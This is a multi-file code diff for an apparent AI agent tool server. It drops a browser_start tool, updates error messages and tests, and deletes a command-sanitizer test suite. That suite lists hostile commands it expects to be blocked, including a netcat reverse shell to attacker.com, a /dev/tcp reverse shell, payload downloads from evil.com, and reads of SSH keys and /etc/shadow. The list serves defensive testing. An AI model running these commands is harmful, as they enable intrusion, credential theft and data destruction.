            log_tool_call("browser_hover", params, result=result)
            return result

@@ -627,7 +627,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_hover_coordinate", params, result=result)
            return _text_only(result)

@@ -712,7 +712,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_press_at", params, result=result)
            return _text_only(result)

@@ -782,7 +782,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_select", params, result=result)
            return result

@@ -860,7 +860,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_scroll", params, result=result)
            return result

@@ -924,7 +924,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_drag", params, result=result)
            return result

@@ -61,7 +61,7 @@ async def _ensure_context(
    Lazy-creates the browser context (tab group + seed tab) the first time
    a profile is used so URL-taking tools (``browser_open`` /
    ``browser_navigate``) can be the agent's single cold-start entry
-    point instead of forcing an explicit ``browser_start`` round trip.
+    point — no separate "start" tool to remember.

    Caller must verify ``bridge`` is connected first; any failure in
    ``bridge.create_context`` propagates so the caller's existing
@@ -137,7 +137,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
            return {
                "ok": True,
                "connected": True,
-                "status": "Extension is connected and ready. Call browser_start to begin.",
+                "status": "Extension is connected and ready. Call browser_open(url) to begin.",
            }

        return {
@@ -150,7 +150,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
                "step_3": "Click 'Load unpacked'",
                "step_4": f"Select this directory: {ext_path}",
                "step_5": ("Click the extension icon in the Chrome toolbar to confirm it says 'Connected'"),
-                "step_6": "Return here and call browser_start",
+                "step_6": "Return here and call browser_open(url) to begin",
            },
            "extensionPath": ext_path,
            "extensionPathExists": ext_exists,
@@ -238,63 +238,6 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
        )
        return result

-    @mcp.tool()
-    async def browser_start(profile: str | None = None) -> dict:
-        """
-        Explicitly create a browser context (tab group) for ``profile``.
-
-        Most workflows do NOT need to call this directly: ``browser_open``
-        and ``browser_navigate`` lazy-create a context on first use, so a
-        single ``browser_open(url)`` covers the cold path. Reach for
-        ``browser_start`` when you want to (a) warm a profile without
-        opening a URL yet, or (b) recreate a context after
-        ``browser_stop`` to clear stale state.
-
-        No separate browser process is launched — uses the user's
-        existing Chrome via the Beeline extension.
-
-        Args:
-            profile: Browser profile name (default: "default")
-
-        Returns:
-            Dict with start status (``"started"`` on fresh creation,
-            ``"already_running"`` when a context for the profile exists),
-            including ``groupId`` and ``activeTabId``.
-        """
-        start = time.perf_counter()
-        params = {"profile": profile}
-
-        bridge = get_bridge()
-        if not bridge or not bridge.is_connected:
-            result = {
-                "ok": False,
-                "error": ("Browser extension not connected. Call browser_setup for installation instructions."),
-            }
-            log_tool_call("browser_start", params, result=result)
-            return result
-
-        try:
-            profile_name, ctx, created = await _ensure_context(bridge, profile)
-            result = {
-                "ok": True,
-                "status": "started" if created else "already_running",
-                "profile": profile_name,
-                "groupId": ctx.get("groupId"),
-                "activeTabId": ctx.get("activeTabId"),
-            }
-            log_tool_call(
-                "browser_start",
-                params,
-                result=result,
-                duration_ms=(time.perf_counter() - start) * 1000,
-            )
-            return result
-        except Exception as e:
-            logger.exception("Failed to start browser context")
-            result = {"ok": False, "error": str(e)}
-            log_tool_call("browser_start", params, error=e, duration_ms=(time.perf_counter() - start) * 1000)
-            return result
-
    @mcp.tool()
    async def browser_stop(profile: str | None = None) -> dict:
        """
@@ -33,11 +33,10 @@ def register_navigation_tools(mcp: FastMCP) -> None:
        """
        Navigate a tab to a URL.

-        Lazy-creates a browser context if none exists (no need to call
-        ``browser_start`` first); when no ``tab_id`` is given and the
-        context was just created, navigation lands on the seed tab.
-        Prefer ``browser_open`` when you specifically want a new tab —
-        ``browser_navigate`` is for redirecting an existing tab.
+        Lazy-creates a browser context if none exists; when no ``tab_id``
+        is given and the context was just created, navigation lands on
+        the seed tab. Prefer ``browser_open`` when you specifically want
+        a new tab — ``browser_navigate`` is for redirecting an existing tab.

        Waits for the page to reach the ``wait_until`` condition before
        returning.
@@ -130,7 +129,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_go_back", params, result=result)
            return result

@@ -180,7 +179,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_go_forward", params, result=result)
            return result

@@ -235,7 +234,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_reload", params, result=result)
            return result

@@ -65,7 +65,7 @@ def register_tab_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_tabs", params, result=result)
            return result

@@ -100,12 +100,12 @@ def register_tab_tools(mcp: FastMCP) -> None:
        """
        Open a browser tab at the given URL — preferred entry point.

-        This is the agent's primary "go to a page" tool. If no browser
-        context exists yet for the profile, one is created transparently
-        (no need to call ``browser_start`` first). The first call after
-        a fresh context reuses the seed ``about:blank`` tab; subsequent
-        calls open new tabs in the agent's tab group. Waits for the
-        page to load before returning.
+        This is the agent's primary "go to a page" tool and the cold-start
+        entry point — if no browser context exists yet for the profile,
+        one is created transparently. The first call after a fresh
+        context reuses the seed ``about:blank`` tab; subsequent calls
+        open new tabs in the agent's tab group. Waits for the page to
+        load before returning.

        Args:
            url: URL to navigate to
@@ -192,7 +192,7 @@ def register_tab_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_close", params, result=result)
            return result

@@ -271,7 +271,7 @@ def register_tab_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_activate_tab", params, result=result)
            return result

@@ -71,17 +71,10 @@ def build_exec_envelope(
        # the foundational skill documents). For simplicity we always
        # store both when either overflows so the agent can fetch the
        # other stream in full too if it wants.
-        combined = (
-            b"--- stdout ---\n"
-            + stdout_bytes
-            + b"\n--- stderr ---\n"
-            + stderr_bytes
-        )
+        combined = b"--- stdout ---\n" + stdout_bytes + b"\n--- stderr ---\n" + stderr_bytes
        output_handle = store.put(combined)

-    semantic_status, semantic_message = classify(
-        command, exit_code, timed_out=timed_out, signaled=signaled
-    )
+    semantic_status, semantic_message = classify(command, exit_code, timed_out=timed_out, signaled=signaled)

    warning = get_warning(command)

@@ -53,9 +53,7 @@ if TYPE_CHECKING:
 # directly — the alternative is spawning the first program with the rest
 # of the line as junk argv, which either errors or returns fake success
 # (e.g. `echo "..." && ps ...` → echo prints the literal command).
-_SHELL_METACHARS: frozenset[str] = frozenset(
-    {"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"}
-)
+_SHELL_METACHARS: frozenset[str] = frozenset({"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"})


 def register_exec_tools(mcp: FastMCP) -> None:
@@ -126,7 +124,8 @@ def register_exec_tools(mcp: FastMCP) -> None:
                        return _err_envelope(command, "command was empty")
                    if any(t in _SHELL_METACHARS for t in tokens) or any(
                        # globs that shlex left unexpanded (`*`, `?`, `[`)
-                        any(c in t for c in "*?[") and t != "[" for t in tokens
+                        any(c in t for c in "*?[") and t != "["
+                        for t in tokens
                    ):
                        auto_shell = True

@@ -20,7 +20,6 @@ from gcu.browser.bridge import BeelineBridge
 from gcu.browser.tools.advanced import register_advanced_tools
 from gcu.browser.tools.inspection import register_inspection_tools
 from gcu.browser.tools.interactions import register_interaction_tools
-from gcu.browser.tools.lifecycle import register_lifecycle_tools
 from gcu.browser.tools.navigation import register_navigation_tools
 from gcu.browser.tools.tabs import register_tab_tools

@@ -107,22 +106,17 @@ class TestMultipleSubagentsTabGroups:

        mock_bridge.create_context = AsyncMock(side_effect=mock_create_context)

-        # Register tools first
-        register_lifecycle_tools(mcp)
-        browser_start = mcp._tool_manager._tools["browser_start"].fn
+        from gcu.browser.tools.lifecycle import _ensure_context

-        # Now patch for execution
-        with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
-            # Simulate 3 different subagents starting browsers
-            results = await asyncio.gather(
-                browser_start(profile="agent_1"),
-                browser_start(profile="agent_2"),
-                browser_start(profile="agent_3"),
-            )
+        results = await asyncio.gather(
+            _ensure_context(mock_bridge, "agent_1"),
+            _ensure_context(mock_bridge, "agent_2"),
+            _ensure_context(mock_bridge, "agent_3"),
+        )

        # Each should have created a separate context
        assert mock_bridge.create_context.call_count == 3
-        assert all(r.get("ok") for r in results)
+        assert all(created for (_, _, created) in results)

    @pytest.mark.asyncio
    async def test_concurrent_tab_operations_different_groups(self, mcp: FastMCP, mock_bridge: MagicMock):
@@ -709,11 +703,11 @@ class TestErrorHandling:
        mock_bridge = MagicMock(spec=BeelineBridge)
        mock_bridge.is_connected = False

-        register_lifecycle_tools(mcp)
-        browser_start = mcp._tool_manager._tools["browser_start"].fn
+        register_tab_tools(mcp)
+        browser_open = mcp._tool_manager._tools["browser_open"].fn

-        with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
-            result = await browser_start(profile="test")
+        with patch("gcu.browser.tools.tabs.get_bridge", return_value=mock_bridge):
+            result = await browser_open(url="https://example.com", profile="test")

        assert result.get("ok") is False
        assert "not connected" in result.get("error", "").lower()
@@ -20,9 +20,7 @@ def test_register_chart_tools_lands_all(mcp):
    from chart_tools import register_chart_tools

    names = register_chart_tools(mcp)
-    assert set(names) == EXPECTED_TOOLS, (
-        f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
-    )
+    assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"


 def test_all_tools_have_chart_prefix(mcp):
@@ -1,238 +0,0 @@
-"""Tests for command_sanitizer — validates that dangerous commands are blocked
-while normal development commands pass through unmodified."""
-
-import pytest
-
-from aden_tools.tools.file_system_toolkits.command_sanitizer import (
-    CommandBlockedError,
-    validate_command,
-)
-
-# ---------------------------------------------------------------------------
-# Safe commands that MUST pass validation
-# ---------------------------------------------------------------------------
-
-
-class TestSafeCommands:
-    """Common dev commands that should never be blocked."""
-
-    @pytest.mark.parametrize(
-        "cmd",
-        [
-            "echo hello",
-            "echo 'Hello World'",
-            "uv run pytest tests/ -v",
-            "uv pip install requests",
-            "git status",
-            "git diff --cached",
-            "git log -n 5",
-            "git add .",
-            "git commit -m 'fix: typo'",
-            "python script.py",
-            "python -m pytest",
-            "python3 script.py",
-            "python manage.py migrate",
-            "ls -la",
-            "dir /a",
-            "cat README.md",
-            "head -n 20 file.py",
-            "tail -f log.txt",
-            "grep -r 'pattern' src/",
-            "find . -name '*.py'",
-            "ruff check .",
-            "ruff format --check .",
-            "mypy src/",
-            "npm install",
-            "npm run build",
-            "npm test",
-            "node server.js",
-            "make test",
-            "make check",
-            "cargo build",
-            "go build ./...",
-            "dotnet build",
-            "pip install -r requirements.txt",
-            "cd src && ls",
-            "echo hello && echo world",
-            "cat file.py | grep pattern",
-            "pytest tests/ -v --tb=short",
-            "rm temp.txt",
-            "rm -f temp.log",
-            "del temp.txt",
-            "mkdir -p output/logs",
-            "cp file1.py file2.py",
-            "mv old.txt new.txt",
-            "wc -l *.py",
-            "sort output.txt",
-            "diff file1.py file2.py",
-            "tree src/",
-            "curl https://api.example.com/data",
-            "curl -X POST -H 'Content-Type: application/json' https://api.example.com",
-        ],
-    )
-    def test_safe_command_passes(self, cmd):
-        """Should not raise for common dev commands."""
-        validate_command(cmd)  # should not raise
-
-    def test_empty_command(self):
-        """Empty and whitespace-only commands should pass."""
-        validate_command("")
-        validate_command("   ")
-        validate_command(None)  # type: ignore[arg-type] — edge case
-
-
-# ---------------------------------------------------------------------------
-# Dangerous commands that MUST be blocked
-# ---------------------------------------------------------------------------
-
-
-class TestBlockedExecutables:
-    """Commands using blocked executables should raise CommandBlockedError."""
-
-    @pytest.mark.parametrize(
-        "cmd",
-        [
-            # Network exfiltration
-            "wget http://evil.com/payload",
-            "nc -e /bin/sh attacker.com 4444",
-            "ncat attacker.com 1234",
-            "nmap -sS 192.168.1.0/24",
-            "ssh user@remote",
-            "scp file.txt user@remote:/tmp/",
-            "ftp ftp.example.com",
-            "telnet example.com 80",
-            "rsync -avz . user@remote:/data",
-            # Windows network tools
-            "invoke-webrequest https://evil.com",
-            "iwr https://evil.com",
-            "certutil -urlcache -split -f http://evil.com/payload",
-            # User escalation
-            "useradd hacker",
-            "userdel admin",
-            "adduser hacker",
-            "passwd root",
-            "net user hacker P@ss123 /add",
-            "net localgroup administrators hacker /add",
-            # System destructive
-            "shutdown /s /t 0",
-            "reboot",
-            "halt",
-            "poweroff",
-            "mkfs.ext4 /dev/sda1",
-            "diskpart",
-            # Shell interpreters (direct invocation)
-            "bash -c 'echo hacked'",
-            "sh -c 'rm -rf /'",
-            "powershell -Command Get-Process",
-            "pwsh -c 'ls'",
-            "cmd /c dir",
-            "cmd.exe /c dir",
-        ],
-    )
-    def test_blocked_executable(self, cmd):
-        """Should raise CommandBlockedError for dangerous executables."""
-        with pytest.raises(CommandBlockedError):
-            validate_command(cmd)
-
-
-class TestBlockedPatterns:
-    """Commands matching dangerous patterns should be blocked."""
-
-    @pytest.mark.parametrize(
-        "cmd",
-        [
-            # Recursive delete of root / home
-            "rm -rf /",
-            "rm -rf ~",
-            "rm -rf ..",
-            "rm -rf C:\\",
-            "rm -f -r /",
-            # sudo
-            "sudo apt install something",
-            "sudo rm -rf /var/log",
-            # Reverse shell indicators
-            "bash -i >& /dev/tcp/10.0.0.1/4444",
-            # Credential theft
-            "cat ~/.ssh/id_rsa",
-            "cat /etc/shadow",
-            "cat something/credential_key",
-            "type something\\credential_key",
-            # Command substitution with dangerous tools
-            "echo `wget http://evil.com`",
-            # Environment variable exfiltration
-            "echo $API_KEY",
-            "echo ${SECRET_TOKEN}",
-        ],
-    )
-    def test_blocked_pattern(self, cmd):
-        """Should raise CommandBlockedError for dangerous patterns."""
-        with pytest.raises(CommandBlockedError):
-            validate_command(cmd)
-
-
-class TestChainedCommands:
-    """Dangerous commands hidden in compound statements should be caught."""
-
-    @pytest.mark.parametrize(
-        "cmd",
-        [
-            "echo hi && wget http://evil.com/payload",
-            "echo hi || ssh attacker@remote",
-            "ls | nc attacker.com 4444",
-            "echo safe; bash -c 'evil stuff'",
-            "git status; shutdown /s /t 0",
-        ],
-    )
-    def test_chained_dangerous_command(self, cmd):
-        """Dangerous commands chained with safe ones should be blocked."""
-        with pytest.raises(CommandBlockedError):
-            validate_command(cmd)
-
-
-class TestEdgeCases:
-    """Edge cases and possible bypass attempts."""
-
-    def test_env_var_prefix_does_not_bypass(self):
-        """FOO=bar wget ... should still be blocked."""
-        with pytest.raises(CommandBlockedError):
-            validate_command("FOO=bar wget http://evil.com")
-
-    @pytest.mark.parametrize(
-        "cmd",
-        [
-            "/usr/bin/wget https://attacker.com",
-            "C:\\Windows\\System32\\cmd.exe /c dir",
-        ],
-    )
-    def test_directory_prefix_does_not_bypass(self, cmd):
-        """Absolute executable paths should still match the blocklist."""
-        with pytest.raises(CommandBlockedError):
-            validate_command(cmd)
-
-    def test_case_insensitive_blocking(self):
-        """Blocking should be case-insensitive."""
-        with pytest.raises(CommandBlockedError):
-            validate_command("Wget http://evil.com")
-
-    def test_exe_suffix_stripped(self):
-        """cmd.exe should be blocked same as cmd."""
-        with pytest.raises(CommandBlockedError):
-            validate_command("cmd.exe /c dir")
-
-    def test_safe_rm_without_dangerous_target(self):
-        """rm of a specific file (not root/home) should pass."""
-        validate_command("rm temp.txt")
-        validate_command("rm -f output.log")
-
-    def test_python_commands_are_safe(self):
-        """python commands (including -c) are allowed for agent scripting."""
-        validate_command("python script.py")
-        validate_command("python -m pytest tests/")
-        validate_command("python3 -c 'print(1)'")
-        validate_command("python -c 'import json; print(json.dumps({}))'")
-        validate_command("node -e 'console.log(1)'")
-
-    def test_error_message_is_descriptive(self):
-        """Blocked commands should include a useful error message."""
-        with pytest.raises(CommandBlockedError, match="blocked for safety"):
-            validate_command("wget http://evil.com")
@@ -2,8 +2,8 @@

 These tests cover the stale-edit guard added for Gap 4:
 - read_file records a per-file hash snapshot
- edit_file / write_file / hashline_edit refuse to run when the on-disk
-  file has diverged from the last recorded read
+- edit_file / write_file refuse to run when the on-disk file has
+  diverged from the last recorded read
 - write_file is allowed without a prior read when the target doesn't
  exist yet (brand-new file, nothing to clobber)
 - re-recording after a successful write keeps chained edits working
@@ -52,7 +52,6 @@ def tools(sandbox: Path):
        "read_file": _find_tool(mcp, "read_file"),
        "write_file": _find_tool(mcp, "write_file"),
        "edit_file": _find_tool(mcp, "edit_file"),
-        "hashline_edit": _find_tool(mcp, "hashline_edit"),
    }


@@ -129,7 +128,7 @@ def test_edit_file_refuses_without_prior_read(sandbox: Path, tools):
    # Clear the cache first so there's definitely no recorded read.
    file_state_cache.reset_all()

-    result = tools["edit_file"]("e.py", "hello", "world")
+    result = tools["edit_file"]("replace", "e.py", "hello", "world")
    assert "Refusing to edit" in result
    assert "read_file" in result

@@ -140,7 +139,7 @@ def test_edit_file_proceeds_after_read(sandbox: Path, tools):
    file_state_cache.reset_all()

    tools["read_file"]("f.py")
-    result = tools["edit_file"]("f.py", "hello", "world")
+    result = tools["edit_file"]("replace", "f.py", "hello", "world")
    assert "Replaced" in result
    assert target.read_text() == "print('world')\n"

@@ -157,7 +156,7 @@ def test_edit_file_refuses_when_file_changed_between_read_and_edit(sandbox: Path
    target.write_text("print('bye')\n")
    os.utime(str(target), None)

-    result = tools["edit_file"]("g.py", "hello", "world")
+    result = tools["edit_file"]("replace", "g.py", "hello", "world")
    assert "Refusing to edit" in result
    assert "Re-read" in result

@@ -185,10 +184,10 @@ def test_chained_edits_in_same_turn_do_not_self_invalidate(sandbox: Path, tools)
    file_state_cache.reset_all()

    tools["read_file"]("chained.py")
-    r1 = tools["edit_file"]("chained.py", "a", "A")
+    r1 = tools["edit_file"]("replace", "chained.py", "a", "A")
    assert "Replaced" in r1
    # Immediate second edit must NOT trip the stale guard because
    # edit_file re-records the post-write state.
-    r2 = tools["edit_file"]("chained.py", "b", "B")
+    r2 = tools["edit_file"]("replace", "chained.py", "b", "B")
    assert "Replaced" in r2
    assert target.read_text() == "print('A')\nprint('B')\n"
@@ -2,10 +2,13 @@

 from __future__ import annotations

+import sys
 import time

 import pytest

+pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
+

@pytest.fixture
 def exec_tool(mcp):
@@ -2,10 +2,13 @@

 from __future__ import annotations

+import sys
 import time

 import pytest

+pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
+

@pytest.fixture
 def job_tools(mcp):
@@ -63,9 +66,7 @@ def test_merge_stderr(job_tools):
        merge_stderr=True,
    )
    job_id = started["job_id"]
-    result = job_tools["logs"](
-        job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5
-    )
+    result = job_tools["logs"](job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5)
    assert "stdout1" in result["data"]
    assert "stderr1" in result["data"]

@@ -3,9 +3,12 @@
 from __future__ import annotations

 import shutil
+import sys

 import pytest

+pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
+

@pytest.fixture
 def search_tools(mcp):
@@ -2,8 +2,12 @@

 from __future__ import annotations

+import sys
+
 import pytest

+pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
+

 def test_resolve_shell_rejects_zsh():
    from terminal_tools.common.limits import ZshRefused, _resolve_shell
@@ -2,6 +2,12 @@

 from __future__ import annotations

+import sys
+
+import pytest
+
+pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
+
 EXPECTED_TOOLS = {
    "terminal_exec",
    "terminal_job_start",
@@ -20,9 +26,7 @@ def test_register_terminal_tools_lands_all_ten(mcp):
    from terminal_tools import register_terminal_tools

    names = register_terminal_tools(mcp)
-    assert set(names) == EXPECTED_TOOLS, (
-        f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
-    )
+    assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"


 def test_all_tools_have_terminal_prefix(mcp):
@@ -56,10 +56,12 @@ async def reproduce_agent_session(session: BrowserSession):
    print("=" * 100)
    total_start = time.time()

-    # ── Turn 1 (seq 1-2): browser_start ──────────────────────────────────
+    # ── Turn 1 (seq 1-2): session start ──────────────────────────────────
+    # Original 2026-02 transcript called the now-deleted browser_start MCP
+    # tool here; cold-start is now folded into browser_open via lazy-start.
    t0 = time.time()
    result = await session.start(headless=False, persistent=True)
-    log(1, "browser_start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
+    log(1, "session.start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)

    # ── Turn 2 (seq 3-4): browser_open ───────────────────────────────────
    t0 = time.time()
@@ -235,10 +237,10 @@ async def demonstrate_correct_approach(session: BrowserSession):
    print("=" * 100)
    total_start = time.time()

-    # ── Turn 1: browser_start ────────────────────────────────────────────
+    # ── Turn 1: session start ────────────────────────────────────────────
    t0 = time.time()
    result = await session.start(headless=False, persistent=True)
-    log(1, "browser_start()", f"ok={result['ok']}", time.time() - t0)
+    log(1, "session.start()", f"ok={result['ok']}", time.time() - t0)

    # ── Turn 2: browser_open + browser_wait for SPA ──────────────────────
    t0 = time.time()
@@ -1,126 +0,0 @@
-"""Tests for example_tool - A simple text processing tool."""
-
-import pytest
-from fastmcp import FastMCP
-
-from aden_tools.tools.example_tool.example_tool import register_tools
-
-
-@pytest.fixture
-def example_tool_fn(mcp: FastMCP):
-    """Register and return the example_tool function."""
-    register_tools(mcp)
-    return mcp._tool_manager._tools["example_tool"].fn
-
-
-class TestExampleTool:
-    """Tests for example_tool function."""
-
-    def test_valid_message(self, example_tool_fn):
-        """Basic message returns unchanged."""
-        result = example_tool_fn(message="Hello, World!")
-
-        assert result == "Hello, World!"
-
-    def test_uppercase_true(self, example_tool_fn):
-        """uppercase=True converts message to uppercase."""
-        result = example_tool_fn(message="hello", uppercase=True)
-
-        assert result == "HELLO"
-
-    def test_uppercase_false(self, example_tool_fn):
-        """uppercase=False (default) preserves case."""
-        result = example_tool_fn(message="Hello", uppercase=False)
-
-        assert result == "Hello"
-
-    def test_repeat_multiple(self, example_tool_fn):
-        """repeat=3 joins message with spaces."""
-        result = example_tool_fn(message="Hi", repeat=3)
-
-        assert result == "Hi Hi Hi"
-
-    def test_repeat_default(self, example_tool_fn):
-        """repeat=1 (default) returns single message."""
-        result = example_tool_fn(message="Hello", repeat=1)
-
-        assert result == "Hello"
-
-    def test_uppercase_and_repeat_combined(self, example_tool_fn):
-        """uppercase and repeat work together."""
-        result = example_tool_fn(message="hi", uppercase=True, repeat=2)
-
-        assert result == "HI HI"
-
-    def test_empty_message_error(self, example_tool_fn):
-        """Empty string returns error string."""
-        result = example_tool_fn(message="")
-
-        assert "Error" in result
-        assert "1-1000" in result
-
-    def test_message_too_long_error(self, example_tool_fn):
-        """Message over 1000 chars returns error string."""
-        long_message = "x" * 1001
-        result = example_tool_fn(message=long_message)
-
-        assert "Error" in result
-        assert "1-1000" in result
-
-    def test_message_at_max_length(self, example_tool_fn):
-        """Message exactly 1000 chars is valid."""
-        max_message = "x" * 1000
-        result = example_tool_fn(message=max_message)
-
-        assert result == max_message
-
-    def test_repeat_zero_error(self, example_tool_fn):
-        """repeat=0 returns error string."""
-        result = example_tool_fn(message="Hi", repeat=0)
-
-        assert "Error" in result
-        assert "1-10" in result
-
-    def test_repeat_eleven_error(self, example_tool_fn):
-        """repeat=11 returns error string."""
-        result = example_tool_fn(message="Hi", repeat=11)
-
-        assert "Error" in result
-        assert "1-10" in result
-
-    def test_repeat_at_max(self, example_tool_fn):
-        """repeat=10 (maximum) is valid."""
-        result = example_tool_fn(message="Hi", repeat=10)
-
-        assert result == " ".join(["Hi"] * 10)
-
-    def test_repeat_negative_error(self, example_tool_fn):
-        """Negative repeat returns error string."""
-        result = example_tool_fn(message="Hi", repeat=-1)
-
-        assert "Error" in result
-        assert "1-10" in result
-
-    def test_whitespace_only_message(self, example_tool_fn):
-        """Whitespace-only message is valid (non-empty)."""
-        result = example_tool_fn(message="   ")
-
-        assert result == "   "
-
-    def test_special_characters_in_message(self, example_tool_fn):
-        """Special characters are preserved."""
-        result = example_tool_fn(message="Hello! @#$%^&*()")
-
-        assert result == "Hello! @#$%^&*()"
-
-    def test_unicode_message(self, example_tool_fn):
-        """Unicode characters are handled correctly."""
-        result = example_tool_fn(message="Hello 世界 🌍")
-
-        assert result == "Hello 世界 🌍"
-
-    def test_unicode_uppercase(self, example_tool_fn):
-        """Unicode uppercase conversion works."""
-        result = example_tool_fn(message="café", uppercase=True)
-
-        assert result == "CAFÉ"
@@ -280,7 +280,7 @@ class TestPatchToolReplaceMode:
        result = edit_fn(
            mode="replace",
            path="b.py",
-            old_string='print(“hi”)',
+            old_string="print(“hi”)",
            new_string='print("HELLO")',
        )
        assert "Error" not in result
@@ -331,14 +331,7 @@ class TestPatchToolPatchMode:
        """A V4A Update hunk replaces matched lines and writes."""
        target = tmp_path / "u.py"
        target.write_text("def f():\n    return 1\n", encoding="utf-8")
-        body = (
-            "*** Begin Patch\n"
-            "*** Update File: u.py\n"
-            " def f():\n"
-            "-    return 1\n"
-            "+    return 42\n"
-            "*** End Patch\n"
-        )
+        body = "*** Begin Patch\n*** Update File: u.py\n def f():\n-    return 1\n+    return 42\n*** End Patch\n"
        edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
        result = edit_fn(mode="patch", patch_text=body)
        assert "Error" not in result
@@ -347,13 +340,7 @@ class TestPatchToolPatchMode:

    def test_patch_add_file(self, file_ops_mcp, tmp_path):
        """Add File: creates a new file from + lines."""
-        body = (
-            "*** Begin Patch\n"
-            "*** Add File: new.py\n"
-            "+# new\n"
-            "+x = 1\n"
-            "*** End Patch\n"
-        )
+        body = "*** Begin Patch\n*** Add File: new.py\n+# new\n+x = 1\n*** End Patch\n"
        edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
        result = edit_fn(mode="patch", patch_text=body)
        assert "Error" not in result
@@ -1,226 +0,0 @@
-"""Tests for the remaining file_system_toolkits — execute_command_tool only.
-
-The file tools (read_file, write_file, edit_file, hashline_edit, search_files,
-apply_patch) all live in aden_tools.file_ops and are tested in test_file_ops.py.
-"""
-
-import asyncio
-import os
-import sys
-from unittest.mock import patch
-
-import pytest
-from fastmcp import FastMCP
-
-
-@pytest.fixture
-def mcp():
-    """Create a FastMCP instance."""
-    return FastMCP("test-server")
-
-
-@pytest.fixture
-def mock_workspace():
-    """Mock agent ID for the shell tool."""
-    return {"agent_id": "test-agent"}
-
-
-@pytest.fixture
-def mock_secure_path(tmp_path):
-    """Patch the shell tool's sandbox resolver onto tmp_path."""
-
-    def _get_sandboxed_path(path, agent_id):
-        return os.path.join(tmp_path, path)
-
-    with (
-        patch(
-            "aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.get_sandboxed_path",
-            side_effect=_get_sandboxed_path,
-        ),
-        patch(
-            "aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.AGENT_SANDBOXES_DIR",
-            str(tmp_path),
-        ),
-    ):
-        yield
-
-
-class TestExecuteCommandTool:
-    """Tests for execute_command_tool."""
-
-    @pytest.fixture
-    def execute_command_fn(self, mcp):
-        from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
-
-        register_tools(mcp)
-        return mcp._tool_manager._tools["execute_command_tool"].fn
-
-    async def test_execute_simple_command(self, execute_command_fn, mock_workspace, mock_secure_path):
